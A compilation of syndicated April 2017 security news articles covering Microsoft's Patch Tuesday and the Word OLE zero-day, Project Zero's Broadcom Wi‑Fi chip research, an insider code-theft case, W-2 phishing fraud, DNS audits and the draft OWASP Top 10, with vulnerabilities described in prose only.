STE WILLIAMS

Microsoft today buried among minor bug fixes patches for critical security flaws that can be exploited by attackers to hijack vulnerable computers.

In a massive shakeup of its monthly Patch Tuesday updates, the Windows giant has done away with its easy-to-understand lists of security fixes published on TechNet – and instead scattered details of changes across a new portal: Microsoft’s Security Update Guide.

Billed by Redmond as “the authoritative source of information on our security updates,” the portal merely obfuscates discovered vulnerabilities and the fixes available for them. Rather than neatly split patches into bulletins as in previous months, Microsoft has dumped the lot into an unwieldy, buggy and confusing table that links out to a sprawl of advisories and patch installation instructions.

Punters and sysadmins unable to handle the overload of info are left with a fact-light summary of April’s patches – or a single bullet point buried at the end of a list of tweaks to, for instance, Windows 10.

Now, ordinary folk are probably happy with installing these changes as soon as possible, silently and automatically, without worrying about the nitty-gritty details of the fixed flaws. However, IT pros, and anyone else curious or who wants to test patches before deploying them, will have to fish through the portal’s table for details of individual updates.

Critical fixes hushed away

These updates include Hyper-V bugs that allow guest applications to hijack underlying host servers or siphon off information. And a remote-code execution bug in trusty WordPad that means opening a malicious file can trigger the installation of spyware or some other software nasty. And another remote-code execution hole in Outlook that means opening or previewing a booby-trapped email can lead to a malware infection.

Crucially, none of these programming blunders are mentioned in the PR-friendly summary put out today by Microsoft – a multibillion-dollar corporation that appears to care more about its image as a secure software vendor than coming clean on where its well-paid engineers cocked up. The summary lists “security updates” for “Microsoft Windows,” “Microsoft Office,” and “Internet Explorer” without version numbers or details.

The summary also fails to point out that three bugs – CVE-2017-0199 in Word and WordPad, CVE-2017-0210 in Internet Explorer, and CVE-2017-2605 in Office – are being actively attacked in the wild by miscreants and the Dridex malware. That latter bug has no patch, by the way: Microsoft just switched off an exploited PostScript filter by default.

“This new portal gives our customers a more relevant and customized user experience and is the single location for information on our security updates,” a Microsoft spokesperson told El Reg. But we already had a single relevant location for security advisories: TechNet bulletins. Now that useful service has been mothballed as Microsoft moves full swing into its patch bundle approach.

Amusingly, if you want a breakdown of the actual bugs fixed, you have to find the acknowledgements page, which lists each vulnerability patched along with a CVE number and the names of the researchers who reported the flaws. This list isn’t perfect, though: the bugs are listed in order of CVE, and not grouped by product or severity, so it’s rather all over the shop.

According to this month’s high-level overview, Redmond has made available patches to address security shortcomings in the following:

• Edge
• Internet Explorer
• Windows
• Office, Office Services, Office Web Apps
• .NET framework
• Flash Player (more on that below)
• Visual Studio for Mac
• Silverlight

These fixes can now be installed automatically via Windows Update. Reboot and you’re done. But wait, there are caveats. For example, the patch bundles KB4015549, KB4015546, KB4015550, KB4015547 that install the security fixes on Windows 7 and 8 have an unfortunate side-effect on computers using AMD Carrizo-based processors – they’ll be blocked from receiving further software updates until Microsoft sorts that out. Gulp!

“If the PC uses an AMD Carrizo DDR4 processor, installing this update will block downloading and installing future Windows updates. Microsoft is working on a resolution and will provide an update in an upcoming release,” we’re told.

How does that even happen?

Anyway, here are the gems we’ve found so far buried in today’s patches:

• Flaws in Office/Word Pad, Internet Explorer, and Office that are being targeted in the wild, according to Zero Day Initiative.
• Seven holes in Hyper-V: three allowing remote code execution (CVE-2017-0162, CVE-2017-0163, CVE-2017-0181), two permitting information disclosure (CVE-2017-0168, CVE-2017-0169), and two denial of service (CVE-2017-0182, CVE-2017-0186). These were found by the Microsoft Offensive Security Research Team, Felix Wilhelm, and Microsoft’s Vulnerabilities Mitigations team.
• A remote-code execution flaw in Outlook (CVE-2017-0106) that can be triggered by simply opening or previewing a maliciously crafted message.
• An information-leaking flaw (CVE-2013-6629) in libjpeg, a JPEG-processing library present on all supported versions of Windows and Windows Server.
• A code-execution flaw in .NET (CVE-2017-0160) that requires local access on the target machine to exploit. The hole is present in all versions of .NET Framework from 2.0 SP2 through 4.7.
• Three flaws in Win32.sys, two allowing information disclosure (CVE-2017-0058, CVE-2017-0188) and one allowing elevation of privilege (CVE-2017-0189). Malicious apps and logged-in users can exploit these to extract data from memory or gain control of the system.
• Microsoft Office flaws that include memory-corruption (CVE-2017-0194) bugs, cross-site-scripting with elevation of privilege (CVE-2017-0195), and a DLL-loading flaw (CVE-2017-0197). An update for Office for Mac addresses an HTML spoofing flaw (CVE-2017-0207).
• Two memory-corruption flaws (CVE-2017-0200, CVE-2017-0205) in Microsoft Edge, while two memory corruption flaws (CVE-2017-0202, CVE-2017-0158) and an elevation of privilege (CVE-2017-0210) error were spotted in Internet Explorer. These bugs can be exploited to run malicious code on a system by tricking a victim into simply opening a booby-trapped webpage.
• Elevation-of-privilege flaws (CVE-2017-0155, CVE-2017-0156) in Windows Graphics and Windows Graphics Component, as well as an elevation of privilege vulnerability in Windows (CVE-2017-0165), allowing a malicious application or logged-in user to hijack a system, and an information-disclosure flaw (CVE-2017-0167) in Windows Kernel.
• ADFS can be brute-forced (CVE-2017-0159) in Windows 10 and Windows Server to allow an account password to be guessed, while Windows 10, 8.1 and Server 2012 allow elevation of privilege (CVE-2017-0165) at admin level and Active Directory can be crashed (CVE-2017-0164) with a malicious search query, and domain controllers can be targeted thanks to an elevation-of-privilege flaw (CVE-2017-0166) in LDAP.
• A denial-of-service flaw (CVE-2017-0191) can be abused by applications to crash Windows and Windows Server boxes, while Windows OLE has an elevation of privilege (CVE-2017-0211) flaw, and the Adobe Type Manager Font Driver can be exploited (CVE-2017-0192) to trigger information disclosure.
• The Windows Scripting Engine sports a memory-corruption (CVE-2017-0201) vulnerability as well as an information-disclosure (CVE-2017-0208) flaw.

A bunch of these bugs were found by, among others, Google Project Zero, folks working with Trend Micro’s Zero Day Initiative, the Qihoo 360 Vulcan Team, Secunia Research at Flexera Software, McAfee, Hyundai, Securify B.V., FireEye, Optiv, SecuriTeam, and Palo Alta Networks.

Of course, Adobe, too

Meanwhile, Adobe stuck with its tried-and-true format of actually telling people what was getting fixed in this month’s Patch Tuesday. The April Flash Player update addresses seven remote code execution flaws for Windows, macOS, and Linux versions.

Adobe also addressed 47 CVE-listed flaws in Acrobat and Reader, two in Photoshop CC for Mac and Windows, two in the Creative Cloud Desktop Application for Windows, and one in Adobe Campaign.

The Flash Player update can be downloaded through Adobe or will be installed automatically in Chrome, Edge and newer versions of Internet Explorer. ®

Spot anything else weird and wonderful in today’s patches? Let us know!

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/04/11/patch_tuesday_mess/

The internal inter-chip communications of devices like smartphones are a “huge, mostly unaudited attack surface,” according to Gal Beniamini of Google’s Project Zero, in his promised follow-up to last week’s demonstration of how to attack Wi‑Fi chips over the air.

His April 4 “part one” prompted emergency patches from Apple and Google, new drivers from Broadcom and a lot of scratched heads about which other devices use the FullMAC system-on-chip (SoC) devices.

Beniamini calls for better memory isolation between SoCs and the host processors, along with exploit mitigations like stack cookies, to protect devices against Wi‑Fi-borne attacks.

Beniamini’s first post only got as far as remote code execution on the Wi‑Fi chip itself, but at the time he said there are paths from the SoC up to the application processor. He’s now detailed those issues in 8,300 words of gory detail here.

If you don’t have much time, Beniamini found both low-level (the easy way) and high-level (the hard way) communication paths that made the application processor attackable:

• The “easy way” is to attack the communications channel that links the SoC to the application processor.
• The “hard way” is to attack high-level messages the SoC passes to signal important Wi‑Fi events to the host (such as SSID discovery, Wi‑Fi power level and so on).

The Register is going to take the liberty of detailing the “easy way” first, reversing the order of Beniamini’s post.

“The utilisation of hardware components remains as it is, and is currently not mitigated against.”

The link from the SoC to the host

SoCs support a bunch of different upstream interfaces – Beniamini lists the mostly obsolete SDIO along with USB and PCIe. PCIe is the fastest, it uses DMA (direct memory access) to talk to the processor, and since it’s becoming the default in modern devices, that’s the one Beniamini chose to attack.

After a fair bit of stack trace work to untangle the communication protocols the Broadcom SoC uses to talk to the host, he found a spot where the SoC “managed to DMA into the physical address range containing the host’s kernel, without any interference” (among other things indicating either a lack of a system memory mapping unit or a configuration error).

Broadcom’s SoftMAC driver brcmsmac revealed to the researchers how to map out the SoC’s DMA access and identify which structures represent host-to-device and device-to-host accesses.

That provided a path to “hijack any kernel function with our own crafted data” – in other words, complete pwnage of the kernel.

The hard way

Beniamini’s “hard way,” actually his first line of research, was to look at how the SoC signals things like “SSID available” or Wi‑Fi power level to the host.

What he found is that such control messages all use the same EtherType, 0x886C, which encapsulates “information about firmware events which must be handled by the host’s driver.”

0x886C frames were unfiltered until last May, but there are two problems with this: if you pwn the SoC, you can revert that patch; and the WLC_E_PFN_SWC event that signals “significant Wi‑Fi change” (one of 144 possible, of which the Broadcom Android driver supports 35 – a genuinely huge attack surface) is still attackable.

Android’s April bulletin fixed five such holes that Beniamini discovered during his research.

The WLC_E_PFN_SWC work revealed an unchecked, untrusted array, meaning “an attacker with the ability to inject arbitrary event frames can specify a small total_count and a larger pkt_count, thereby triggering a simple kernel heap overflow.”

The reason Beniamini set aside this line of work is that while the vulnerability is genuine, it would have been “tedious” to write a reliable exploit (he should know, given the amount of work needed to get through to a kernel crash).

Beniamini’s how-to for pwning the Wi‑Fi processor is here, and our summary is here. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/04/12/broadcom_soc_security_project_zero/

America’s Defense Advanced Research Project Agency reckons too many vulnerabilities arise from hardware design errors, so it wants experts and boffins to propose better hardware-level security mechanisms.

Baked-in security is a vexed question, for good reason: recipe slips can also hard-wire vulnerabilities into a chip. For example, Intel’s Security Guard Extensions (SGX) is a favourite target for attack boffins crafting proofs-of-concept against the architecture.

Nonetheless, DARPA wants something better than “patch and pray” software security, so on April 21, it’s hosting a Proposers Day for its System Security Integrated Through Hardware and Firmware (SSITH – presumably the extra letter is there to avoid getting LucasFilm lawyers’ letters).

What it wants is “hardware design tools that provide security against hardware vulnerabilities”, for both Department of Defense and commercial systems.

They want designers to “limit the permitted hardware to states that are assured to be secure”, without sacrificing performance.

Of particular interest in the DARPA program are the seven vulnerability classes known as Common Weakness Enumeration (CWE) applicable to hardware but exploitable through software.

These are permission/privilege errors, buffer errors, resource management, information leakage, numeric errors, cryptographic errors, and code injection vulnerabilities. Together, DARPA reckons hardware bugs of this type represents 40 per cent of currently known attacks.

The program is managed by Linton Salmon of DARPA’s Microsystems Technology Office, who in the agency’s announcement says software patches to hardware flaws aren’t enough.

The SSITH program wants to “remove those hardware vulnerabilities in ways that will disarm a large proportion of today’s software attacks.”

SSITH is a 39-month program covering “development and demonstration of hardware architectures”; and techniques to measure the security of new hardware designs, including tradeoffs in things like performance, power efficiency, and circuit area. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/04/12/darpa_ssith_program/

Your daily round-up of some of the other stories in the news

Macron vows to crack down on encryption

French presidential candidate Emmanuel Macron (pictured) has become the latest politician to try and score political points by attacking encryption.

Speaking at the official launch of his presidential campaign in Paris, Macron said he would compel tech companies to provide access to encrypted messages exchanged between terror suspects on their plaforms. He added: “Until now, big internet companies have refused to give their encryption keys or access to this content, saying that they have told their clients that their communications are encrypted. This situation is no longer acceptable.”

As we’ve discussed before on Naked Security, what Macron and UK home secretary Amber Rudd, among others, are calling for is theoretically possible if the organisations chose to abandon end-to-end encryption, it’s not a workable idea, for many reasons.

Macron wants to have discussions with Google, Facebook, Apple and Twitter. We’ll be keeping an eye on what they say to Macron about his plan.

FCC abandons plans to allow cellphone calls on flights

Good news for passengers on American carriers who’d rather they couldn’t be reached by mobile phone when flying: the chairman of the FCC has said that he will throw out a 2013 proposal to allow calls on aircraft.

The proposal was made in 2013 to allow calls after concerns about interference endangering aircraft had been allayed thanks to technological advances: the ban on mobile phone calls while aloft was first imposed on 1991.

FCC chairman Ajit Pai said: “I stand with airline pilots, flight attendants and America’s flying public against the FCC’s ill-conceived 2013 plan to allow people to make cellphone calls on planes.”

Formally abandoning the plan, he added: “I do not believe that moving forward with this plan is in the public interest. Taking it off the table permanently will be a victory for Americans across the country who, like me, value a moment of quiet at 30,000 feet.”

AI thrashes humans in poker competition

Six human poker players have been trounced by AI in China, with the prize of $290,000 going to Lengpudashi, an updated version of the already human-beating Libratus AI system.

Carnegie Mellon’s AI system, which lives in a supercomputing centre in Pittsburgh, played 36,000 hands against the team of six humans including poker expert and venture capitalist Alan Du over five days on the Chinese island of Hainan, beating the humans “by a landslide”, reported Bloomberg.

Apparently Lengpudashi learned to bluff not from mimicking human players but from game theory. Noam Brown, a co-developer of Libratus, an earlier version of Lengpudashi, said: “Its theories were computed just from the rules of the game, not from analysing historical data.”

Catch up with all of today’s stories on Naked Security

Follow @NakedSecurity
Follow @katebevan

 

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/_LPPGfZ0dIs/

Microsoft Tuesday patched a previously undisclosed Word zero-day vulnerability attackers used to install a variety of malware on victims’ computers.

The zero-day first came to light late last week. In its investigation, SophosLabs determined that exploits against the vulnerability had been happening for some time. SophosLabs principal researcher Gábor Szappanos estimated that most of the activity occurred in March-April 2017, but the first sample the lab located dates back to November 2016.

In its bulletin, Microsoft said the security update resolves vulnerabilities in Microsoft Office that could allow remote code execution if a user opens a specially crafted Office file. Of the fix, the software giant said, simply:

This security update disables certain graphics filters.

The vulnerability

On unpatched systems, the vulnerability is triggered by opening a document that provokes a benign-looking download warning, followed by a download from a booby-trapped server that sends a document of a more dangerous sort.

In this case, the booby-trapped server sends out a compiled HTML file with an embedded program script. Word accepts and runs the script without producing the warning you would expect to see.

It affects all current Office versions used on every Windows operating system, including the latest Office 2016 running on Windows 10. Attacks do not rely on enabled macros, so no warning for macro-laden documents will appear. The Dridex banking Trojan is among the malware being used in some of the exploits.

Details of the vulnerability were first released by McAfee and FireEye over the weekend. It’s the latest in a long line of bugs attackers can take advantage of through maliciously constructed files.

The United States Computer Emergency Readiness Team (US CERT), part of the Department of Homeland Security (DHS), issued its own advisory on the flaw:

The Microsoft OLE2Link object can open application data based on the server-provided MIME type, which can allow an unauthenticated remote attacker to execute arbitrary code on a vulnerable system.

The exploits used in the wild have the following characteristics, CERT said:

• The document that triggers the OLE2Link vulnerability is an RTF document that masquerades as a Microsoft Word DOC file.
• The exploit connects to a remote server to obtain an execute an HTA file, which contains VBScript to be executed by the client.

This attack does depend on the user accepting a “load remote content” warning. Without that, the external content will not be pulled.

The patch and other defenses

Sophos detects the first stage RTF downloader used in these exploits as Troj/DocDrop-TJ, and the second stage HTA code as Troj/DocDrop-SU. Sophos customers are protected.

The ultimate solution here is to install Microsoft’s patch as soon as possible. For additional defenses for this and other threats, we suggest the following:

• If you receive a Word document by email and don’t know the person who sent it, DON’T OPEN IT.
•  It appears that attacks seen in the wild thus far can’t bypass the Office Protected View, which means enabling it may provide some extra protection.
• Use an anti-virus with an on-access scanner (also known as real-time protection). This can help you block malware of this type in a multi-layered defense, for example, by stopping the initial booby-trapped word file, preventing the Dridex download, blocking the downloaded malware from running, and finding and killing off the Dridex malware in memory.
• Consider stricter email gateway settings. Some staff are more exposed to malware-sending crooks than others (such as the order processing department), and may benefit from more stringent precautions, rather than being inconvenienced by them.
• Consider using Microsoft’s dedicated Word and Excel viewer programs to look at email attachments. Most documents will display just fine, but embedded macros aren’t supported and thus cannot run.
• Never turn off security features because an email or document says so. Documents such as invoices, courier advisories and job applications should be legible without macros enabled.

Follow @NakedSecurity
Follow @BillBrenner70

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/iQvZhBL9l6E/

FBI agents have collared a programmer accused of stealing rifling through colleagues’ user accounts and stealing proprietary stock trading software.

Since 2010, Zhengquan Zhang was employed by a New York finance house that makes billions of dollars in trades a day via sophisticated algorithmic trading models and trading platforms. Investigators claim that between December last year and March this year, Zhang stole more than three million files from his employers, including source code for the trading system.

Zhang was arrested on Friday in California by the Feds, and was charged with the theft of trade secrets.

“As alleged, Zhengquan Zhang went to great lengths to surreptitiously steal confidential computer code from his employer,” said Acting US Attorney for the Southern District of New York, Joon Kim. “Zhang allegedly installed code designed to steal his employer’s proprietary information and illegally accessed colleagues’ computer systems to further his theft.”

Court documents [PDF] claim Zhang’s employers were tipped off when one of their quantitative analysts tried logging in to his work desktop from home on Saturday, March 25. However, the analyst wasn’t able to get in because someone else was using it. He found that the intruder had been going through his email archives.

The next day the analyst called the internal network security team, told them about the situation, and handed over the user ID of the intruder. The engineers allegedly identified the ID as belonging to Zhang, and promptly locked him out of the system.

On Monday morning, Zhang emailed the analyst apologizing for the intrusion, it is claimed. He said he was worried the company was being taken over and he was concerned about losing his job, thus he was trying to find out more information, the court was told.

“I’m still questioning myself why I did that,” Zhang allegedly wrote, before going on to explain he was able to get into the analyst’s remote desktop because he had modified a company web app to siphon off employees’ usernames and passwords, it is claimed. In a phone call, he also told the analyst he had entered several other accounts, it is alleged.

A subsequent investigation showed he’d done more than that, the court documents claim. Although Zhang was a software engineer at the firm, he wasn’t normally allowed to view or touch the trading platform’s source code. However, he managed to gain access to this source and an exfiltrated copy of it “thousands of times,” according to prosecutors. Specifically, Zhang is accused of:

• Installing software to scan the network for encryption keys needed to access and build the trading source code.
• Exfiltrating the source code and email inboxes to an outside software development website, starting in December 2016. This website isn’t named but it sounds like GitHub, GitLab, or similar.
• Stashing three million internal files on the network before uploading the data to the outside website.
• Smuggling the data out of the company via a backup proxy server.

When the company had seen enough evidence, it filed a complaint, and Zhang was cuffed and transferred to California.

Allegations … the prosecution’s case against Zhang

“Proprietary computer code may not be a tangible asset that people can observe, but it is indeed one of the most critical assets that companies possess,” said FBI assistant director in charge of the FBI’s New York Field Office, William Sweeney Jr.

“Significant investments are made to develop code, safeguard it and use it to generate revenue. The FBI is committed to enforcing laws that protect US companies from the theft of trade secrets.” ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/04/11/software_developer_cuffed_for_stealing_code/

W-2 fraud used to target businesses exclusively but has now set its sights on many other sectors. Here’s what you can do to prevent it from happening to you.

Northwestern College, Groton School District in Connecticut, San Marcos City in Texas, Ellwood Thompson’s specialty grocery store, Meridian Health Services, Monarch Beverage — what do they have in common? Each has fallen victim to W-2 tax fraud in the last two months.

What was once a scam known for exclusively targeting the corporate world has expanded to other sectors, including school districts, tribal organizations, and nonprofits. W-2 fraudsters show no prejudice — regardless of geographic location, industry, and organization size, we’re seeing employees across the spectrum fall victim.

Because W-2 fraud doesn’t discriminate, it’s become a wildly successful phishing scheme. Here’s how it works: malicious actors spoof the CEO or president of a company and email an employee with financial responsibilities (think CFO or department head-level personnel) to request copies of all employees’ W-2 forms. The employee, believing that the boss needs this info, falls victim to the fake email, shares confidential information, and sets in motion a daisy chain of events that will damage the company and its employees.

W-2 fraud attacks are particularly dangerous because the fallout has long legs. IRS Commissioner John Koskinen wrote in a statement, “This is one of the most dangerous email phishing scams we’ve seen in a long time. It can result in the large-scale theft of sensitive data that criminals can use to commit various crimes, including filing fraudulent tax returns.”

[Check out the two-day Dark Reading Cybersecurity Crash Course at Interop ITX, May 15 16, where Dark Reading editors and some of the industry’s top cybersecurity experts will share the latest data security trends and best practices.]

Despite warnings from the IRS in early February, employees continue to fall for the bad guys’ social engineering ploys. In fact, the problem is growing in 2017. According to Tamara Powell, a program manager in the IRS wage and investment group, during the 2016 filing season, the IRS found that about 300,000 W-2s were compromised by W-2 scams. Compare that to what we’ve seen just this year: in January 2017 alone, the IRS found that 300,000 W-2s were compromised. No matter how you do the math, that’s an unbelievable year-over-year increase. A compilation of the victims is also available on DataBreaches.net. These are not only huge numbers but massive increases for a problem that’s mostly avoidable.

What to Do about W-2 Fraud
While organizations of all sizes and in all industries are at risk, the precautions are the same for everyone. Your IT team and internal security professionals will want to know if the endpoint solutions already in place will prevent W-2 fraud. They won’t. The good news is that your team won’t need to make another technology investment; it really comes down to educating employees on some basics to better protect your organization:

• Notify the HR and accounting departments: Your finance and HR teams are the ones that are going to receive the fake emails, so before anything else, warn them there is a strain of CEO fraud asking for W-2s. What should they do if they get an email they think is a phishing email? Tell them to always verify requests like that using something other than email (phone, text, an in-person conversation). Warning these teams immediately may prevent a host of problems.
• Encourage suspicion: As a security pro, you normally wouldn’t ask employees to actively be distrustful in their jobs, but when it comes to W-2 fraud, you want to encourage appropriate teams — finance, accounting, and HR — to run things through a sniff test. If someone in your organization receives an email asking about W-2 forms from literally anyone, alarms should sound. Encourage everyone to pick up the phone and verify that the email was truly sent by the CEO (or other appropriate party).
• Educate: Read and circulate this link to the IRS site with more tax scams you need to watch out for.
• Sound the alarm: If you receive a scam, report it. The IRS says organizations that receive a W-2 scam email should forward it to [email protected] and place “W2 Scam” in the subject line. Consider filing form 14039 and request an IP PIN from the government. Form 14039 requires you to state you believe you are likely to be a victim of identity fraud. Even if cybercriminals haven’t tried to file a bogus tax return in your name, virtually every American’s data has been stolen, which can lead to your identity being stolen. 
• Watch for follow-up: Cons keep getting bolder and have started combining W-2 fraud with CEO fraud. Tell your accounting and finance teams to watch for a “follow-up” email around the same time from the comptroller or CFO that asks them to conduct a wire transfer to a certain account. The steps are the same here — teach your staff to pick up the phone or have a face-to-face discussion to verify the request before acting on it.
• Check configurations: A whopping 82% of email servers allow spoofed emails to pass through. Make sure you test this and correctly configure the email servers to not let spoofed domains through. Frameworks such as SPF, DMARC, and DKIM are useful to get this set up correctly.

Although tax season may be coming to a close, phishing schemes aren’t slowing down. W-2 fraud is just one of the many tax scams to watch out for; check out 9 Phishing Lures that Could Hijack your 2017 Tax Refund for additional schemes to keep on your employees’ radar.

Related Content:

• Hacking the Business Email Compromise
• Businesses Hit by More W-2 Fraud as Cybercriminals Shift Tax Season Targets
• Security Training 101: Stop Blaming The User

Stu Sjouwerman (pronounced “shower-man”) is the founder and CEO of KnowBe4,Inc., which hosts the world’s most popular integrated Security Awareness Training and Simulated Phishing platform. A data security expert with more than 30 years in the IT industry, Sjouwerman was the … View Full Bio

Article source: http://www.darkreading.com/endpoint/tax-season-surprise-w-2-fraud/a/d-id/1328595?_mc=RSS_DR_EDT

Here’s a 5-step DNS security review process that’s not too scary and will help ensure your site availability and improve user experience.

Image Source: Adobe Stock

The DDoS attack against DNS provider Dyn that took out large swaths of the Internet put a million-candle spotlight on the issue of the availability, and proved that proper DNS management is not just an IT issue, but a security mandate as well. Maintaining website availability and preventing revenue loss from associated outages depends upon good DNS hygiene, maintenance, and control.

DNS tends to be a set-and-forget type of technology… and that can pose problems several years after everything has been forgotten, according to Chris Roosenraad, director of product management for DNS service at Neustar.

Dark Reading caught up with several experts to discuss why it is important to regularly check on DNS configurations and how to begin the job.

Roosenraad — who has more than two decades of security, networking and public policy expertise, having previously developed the DNS architecture for Charter Communications and Time Warner Cable — says that DNS audits sound more foreboding than they actually are. This is not necessarily some big, scary compliance activity. It is just a way of accounting for all of the DNS infrastructure configuration to ensure that things haven’t gotten out of sync with changing business realities. 

“It’s just a process of taking some away from the 30 other multitasking things that we all have in front of us to sit down and say, ‘Is this what I really want my Internet presence to be?'” he says.

How to begin the process? Here are five essential steps to conducting a successful DNS audit. 

 

Ericka Chickowski specializes in coverage of information technology and business innovation. She has focused on information security for the better part of a decade and regularly writes about the security industry as a contributor to Dark Reading.  View Full Bio

Article source: http://www.darkreading.com/cloud/forget-the-tax-man-time-for-a-dns-security-audit/d/d-id/1328604?_mc=RSS_DR_EDT

Microsoft released a security update for a flaw in the OLE API that affects most versions of Microsoft Word.

Microsoft today patched a critcial zero-day vulnerability in Microsoft Office/WordPad that attackers had been exploiting in the wild for months.

CVE-2017-0199 is a remote code execution vulnerability in the Windows Object Linking and Embedding (OLE) application programming interface. The vulnerability already had been weaponized in attacks to distribute the Dridex banking Trojan, as a botnet payload, and in a cyber espionage campaign.

Security firm McAfee published a report on April 7 to warn users of an exploit that has been used to target users since late January. SophosLabs claims attacks actually date back to November 2016, with most occuring between March and April 2017.

There are a few reasons this bug is especially dangerous: it affects most, or all, Windows versions of Microsoft Word, and targets don’t have to enable macros for exploits to be effective, explains Bryan Burns, vice president of threat research and engineering at Proofpoint.

Burns says it’s a logic bug, which is harder to defend against, he says. Victims are more likely to fall for these attacks because they aren’t prompted to enable macros — something businesses teach their employees to avoid. Instead, the attacks use a dialogue box.

“They’ve probably been trained over the last several years not to enable macros,” says Burns. “This is a different vector. Users haven’t seen a dialogue box. They haven’t been trained not to click on it.”

The attackers attach emails containing Microsoft Word RTF (Rich Text Format) documents. Subject lines read “Scan Data” and attachments were named “Scan_123456.doc” or “Scan_123456.pdf” with “123456” replaced with random numbers, Proofpoint reports.

When launched, the exploit connects to a remote server, downloads a file containing HTML application content, and executes it as a .hta file, McAfee explains. Because .hta is executable, the attacker gains full code execution on the machine. After the malware has been installed, the exploit closes the bait Word document and displays a new one to show the victim.

The exploit uses an embedded OLE2link object in specially created documents.

“Everything is working as designed,” says Burns of how the attack deceives targets. “But the way it’s designed, it left a corner open so code can run when you wouldn’t expect it to be running.”

In the case of Dridex, attackers obtained full system control to launch the banking Trojan malware. This enabled them to grab businesses’ financial credentials and intercept transactions to steal money. “In this case, it was financially motivated,” says Burns of the attackers’ goals. “They were trying to infect with this malware to empty out [organizations’] bank accounts.”

But Burns warns that this Office flaw would allow for any type of malware to be installed. Ransomware is one example Proofpoint sees frequently distributed.

“We would expect any threat actor who is trying to attack businesses to try this technique,” he cautions.

Several security firms aside from Proofpoint observed this vulnerability in the wild ahead of Microsoft’s patch. Netskope’s Threat Research Labs linked this zero-day to the Godzilla botnet loader. Researchers saw IPs released to the botnet loader serving payloads related to exploits for the vulnerability using malicious Word documents.

In a different scenario, FireEye spotted this flaw being used in a cyber espionage campaign targeting Russian-speaking victims since January 2017 and installing FINSPY, a tool previously associated with the “lawful intercept” company Gamma Group. FireEye in another case saw exploits installing Latentbot, a malware family used by cybercriminals for financial gain.

Now that Microsoft has issued a fix, businesses should protect themselves by patching as quickly as possible, Burns says. He also cautions organizations to be wary of these types of attacks, as email as the “dominant threat vector” hackers will use to infect businesses.

Meanwhile, today is the last day of extended support for Windows Vista. The OS will no longer receive updates or support from Microsoft. 

Related Content:

• When Hacks Are about Image instead of Money
• One of World’s Most Wanted and Prolific Alleged Spammers Arrested
• China-Based Threat Actor APT10 Ramps Up Cyber Espionage Activity

Kelly is an associate editor for InformationWeek. She most recently reported on financial tech for Insurance Technology, before which she was a staff writer for InformationWeek and InformationWeek Education. When she’s not catching up on the latest in tech, Kelly enjoys … View Full Bio

Article source: http://www.darkreading.com/vulnerabilities---threats/microsoft-office-zero-day-patched-after-months-of-attacks/d/d-id/1328607?_mc=RSS_DR_EDT

The industry benchmark list is about to change for the first time in four years, but barring a few important changes, it looks a lot like it always has.

After a four-year hiatus, OWASP this week released a working draft of the latest iteration of its OWASP Top 10 vulnerabilities list.

Security leaders welcome some vital changes to the list – namely the addition of application programming interfaces (APIs) – that acknowledge shifts in the development and threat landscape, with hopes that these types of changes would be made more frequently in the future. Others note that in many ways the list looks very similar to previous incarnations. And some say that’s a testament to the need for developer practices– not the list itself–to more rapidly evolve.

A staple benchmark of the application security world, the OWASP Top 10 was designed to help developers avoid common coding bugs and provide security teams some standards for prioritizing vulnerability mitigation. It often sets the tone for enterprise application security program priorities and is also found at the root of many vulnerability testing product-scoring mechanisms and prioritization algorithms. 

“To me, the 2017 Top 10 reflects the move towards modern, high-speed software development that we’ve seen explode across the industry since the last version of the Top 10 in 2013,” says Jeff Williams, CTO of Contrast Security and one of the key authors of the list since it was first developed in 2003. “While many of the vulnerabilities remain the same, the addition of APIs and attack protection should focus organizations on the key issues for modern software.”

According to Kunal Anand, CTO and co-founder of Prevoty, the inclusion of APIs is probably the most meaningful change in this go-around. It’s an important addition that addresses the way enterprises operates in this day and age of microservices-enabled DevOps and Agile shops.

“Enterprises across many industries, including finance and retail, are deconstructing large monolithic applications into smaller leaner services and micro-services. It’s common for an average application to make dozens of API calls to render a single page, with many of the calls distributed across different services,” he says. “APIs are ultimately applications, albeit more focused. In 2016, we started to see very targeted attacks against API frameworks. I suspect we’ll see a continuation of that in 2017.”

This new addition could potentially help raise more awareness about API security, which is largely ignored at most organizations today, says Ryan O’Leary, vice president of WhiteHat Security’s Threat Research Center.

“This is a great change and really speaks to the changing dynamic of how we develop applications and build them for modern consumption,” he says.

Having said that, both Anand and O’Leary believe that the Top 10 list isn’t evolving quickly enough to keep up with the pace of change in how software is delivered and in threat patterns.

“I’d like to see an increased cadence when it comes to updating the OWASP Top 10. The Internet, and more specifically applications, looked a lot different in 2013. In our industry, it’s possible to see big changes in just a couple of years,” says Anand, who sees trends like serverless-based technologies, containerization and mobile development frameworks like React all changing the game to the point where they’ll need to be addressed in the near future. “I hope we can update OWASP to cover these large trends and changes more frequently.”

To be fair, though, in many ways the major problems in applications have remained fairly static over the last 14 years.

“We have added and removed a few items over the years, but this year’s list is very similar to what we released in 2003,” says Williams.

In a lot of ways, the OWASP Top 10 pretty well illustrates appsec’s prevailing trend of the more things change, the more they stay the same, says Ben Tomhave, principal security scientist for New Context Services.

“There’s no point in producing a new list every year, because – as demonstrated by the high degree of similarity between recent versions – things simply don’t change that quickly,” he says. “The strong similarities between the 2017 Top 10 list and previous iterations suggests that current approaches to developer awareness and education aren’t working. We clearly have as long way to go, and likely need to change tactics to achieve better outcomes.”

And, in fact, one of the other changes that was made this time around kind of acknowledges that, O’Leary says.

“OWASP is now stating that companies need to have some sort of WAF or RASP technology to detect, respond, and patch. This is going to be a controversial one as it’s a mitigation to a vulnerability and not a vulnerability in itself,” he says. “The OWASP list has typically been focused around vulnerabilities and how to fix or protect against those threats. With this change OWASP is now saying that a 3rd party service or tool is needed. This is likely a result of how slow the industry is to fix vulnerabilities.”

He believes the new inclusion will be a hot button topic for a long time to come.

Related Content:

• 80% Of Web Applications Contain At Least One Security Bug
• 25 Percent of Web Apps Still Vulnerable to Eight of the OWASP Top Ten
• 7 Steps to Transforming Yourself into a DevSecOps Rockstar
• 7 Hot Security Terms (and Buzzwords) to Know

Ericka Chickowski specializes in coverage of information technology and business innovation. She has focused on information security for the better part of a decade and regularly writes about the security industry as a contributor to Dark Reading.  View Full Bio

